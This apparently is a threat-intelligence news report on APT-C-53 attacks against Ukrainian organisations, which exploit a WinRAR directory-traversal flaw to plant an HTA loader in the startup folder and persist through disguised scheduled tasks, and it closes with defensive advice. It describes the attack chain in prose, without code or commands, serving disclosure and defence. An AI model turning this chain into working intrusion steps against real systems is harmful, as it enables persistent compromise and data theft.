APT-C-53 Hits Ukraine: New Attack Exploits WinRAR Flaw for Persistence

APT-C-53 has once again intensified its distribution of malicious attachments targeting organizations in Ukraine. The latest wave of attacks demonstrates that the group continues to refine its stealth-penetration toolkit and to update its initial-access techniques, pairing them with its long-established multilayered script-execution framework.

According to the 360 Threat Intelligence Center, the attackers are exploiting CVE-2025-8088 in the WinRAR archiver—a flaw that enables hidden data to be written into arbitrary system directories. The victim receives an email containing an archive that appears to hold only a harmless file. When extraction is attempted, a directory-traversal mechanism is triggered, silently depositing a malicious HTA file into the Windows startup folder. It is executed at the next login, granting the attackers persistence.

The HTA-based loader created by the group launches a compact VBScript whose task is to invoke mshta.exe and retrieve the next stage of malicious code from a remote server, disguised as a PDF. After processing, the script unfolds a multilayered VBS structure containing fragments that are decoded at runtime. These fragments include communication algorithms for command-and-control servers, data-collection utilities, and components for deploying additional covert mechanisms.

Once the primary payload has executed, the script ensures persistence through several channels. In addition to planting entries in the startup folder, it creates duplicate files within user directories and adds a fraudulent scheduled task whose name mimics a legitimate system entry. This establishes a secondary persistence layer capable of surviving reboots or administrative intervention. The configured communication points include primary and fallback addresses to maintain continuity of the command infrastructure.

The sequence of operations, choice of tools, and characteristic multilayered VBS scripts align closely with APT-C-53’s long-running campaigns of clandestine data collection against Ukrainian entities. The combination of a newly exploited vulnerability and a well-practiced execution chain enables the group to maintain resilience and hinder detection.

Experts recommend strengthening attachment filtering on mail gateways, with particular attention to archives containing atypical or suspicious content. They further underscore the need for enhanced monitoring of system logs—especially events related to startup entries, scheduled-task creation, and script execution. Improving workstation hardening, regularly updating security solutions, and scrutinizing suspicious files can significantly reduce the risk of data loss from such incidents.

Support Our Threat Intelligence

If you find our technology report and cybersecurity news helpful, consider supporting our work.

Buy Me a Coffee PayPal Crypto

USDT (TRC20):

TN8BdV8cp4T1Cd28gK9qTAnZknzzuwyUtm Copy

USDT (ERC20):

0x3725e1a7d3bc5765499fa6aaafe307fabcd75bce Copy